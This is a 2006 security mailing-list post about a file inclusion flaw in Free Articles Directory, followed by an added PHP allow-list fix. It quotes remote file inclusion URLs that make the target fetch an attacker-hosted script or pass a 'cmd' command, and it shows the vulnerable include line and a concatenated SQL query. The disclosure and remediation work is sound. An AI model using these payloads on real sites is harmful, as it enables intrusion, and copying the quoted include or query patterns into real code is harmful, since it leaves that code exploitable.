[VIM] Free Articles Directory - file inclusion, code execution?

Josh Zlatin jzlatin at ramat.cc
Wed Mar 22 07:46:38 EST 2006


On Wed, 22 Mar 2006, security curmudgeon wrote:

>
> http://archives.neohapsis.com/archives/bugtraq/2006-03/0396.html
>
> Original disclosure isn't very clear, but the sample looks like it is passing 
> arbitrary commands to be executed:
>
>  http://[target]/index.php?page=evilcode?&cmd=uname -a
>
> http://www.secunia.com/advisories/19320/
>
> Secunia is calling this local/remote file inclusion. Clarification or 
> different issue?

Looks to me like a clarification, meaning:
http://[target]/index.php?page=http://[attacker]/evilscript

opens and runs the PHP script (note the following code in index.php, though):
include($_GET["page"].".php");

I was unable to run uname -a or any other command I tried via the cmd
command, but that is probably because the 'cmd' variable is defined as
the result of the following SQL query:
SELECT * FROM document_master where doc_title='".$_GET["pagedb"].

--
  - Josh
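
An added example, not part of the original message or of the Free Articles Directory code: one way to replace the `include($_GET["page"].".php");` line quoted above so that the request value only selects from an allow-list and never becomes part of the include path. The page names, the `pages` directory and the `resolve_page()` helper are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical page names and directory; the application's real pages
// are not listed in the post.
const PAGES_DIR = __DIR__ . '/pages';
const ALLOWED_PAGES = ['home', 'articles', 'contact'];

/**
 * Map the user-supplied "page" value to a file path, or null if it is
 * not an expected page. The value is compared against the allow-list
 * and is never used to build a path or URL on its own.
 */
function resolve_page($requested): ?string
{
    if (!is_string($requested)) {
        return null;                 // e.g. page[]=x arrives as an array
    }
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;                 // URLs, "../" sequences, unknown names
    }
    return PAGES_DIR . '/' . $requested . '.php';
}

// Constructed sample inputs, including the URL form quoted in the message.
$samples = [
    'home',
    'http://[attacker]/evilscript',
    '../../etc/passwd',
    ['x'],
    'articles',
];

foreach ($samples as $s) {
    $path = resolve_page($s);
    printf("%-34s => %s\n",
        json_encode($s, JSON_UNESCAPED_SLASHES),
        $path ?? 'rejected');
}

// In index.php the quoted include line would then become:
//   $path = resolve_page($_GET['page'] ?? 'home');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

Setting `allow_url_include = Off` in php.ini additionally stops `include` from fetching `http://` paths, but it does not cover local file inclusion, so the allow-list is still needed.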

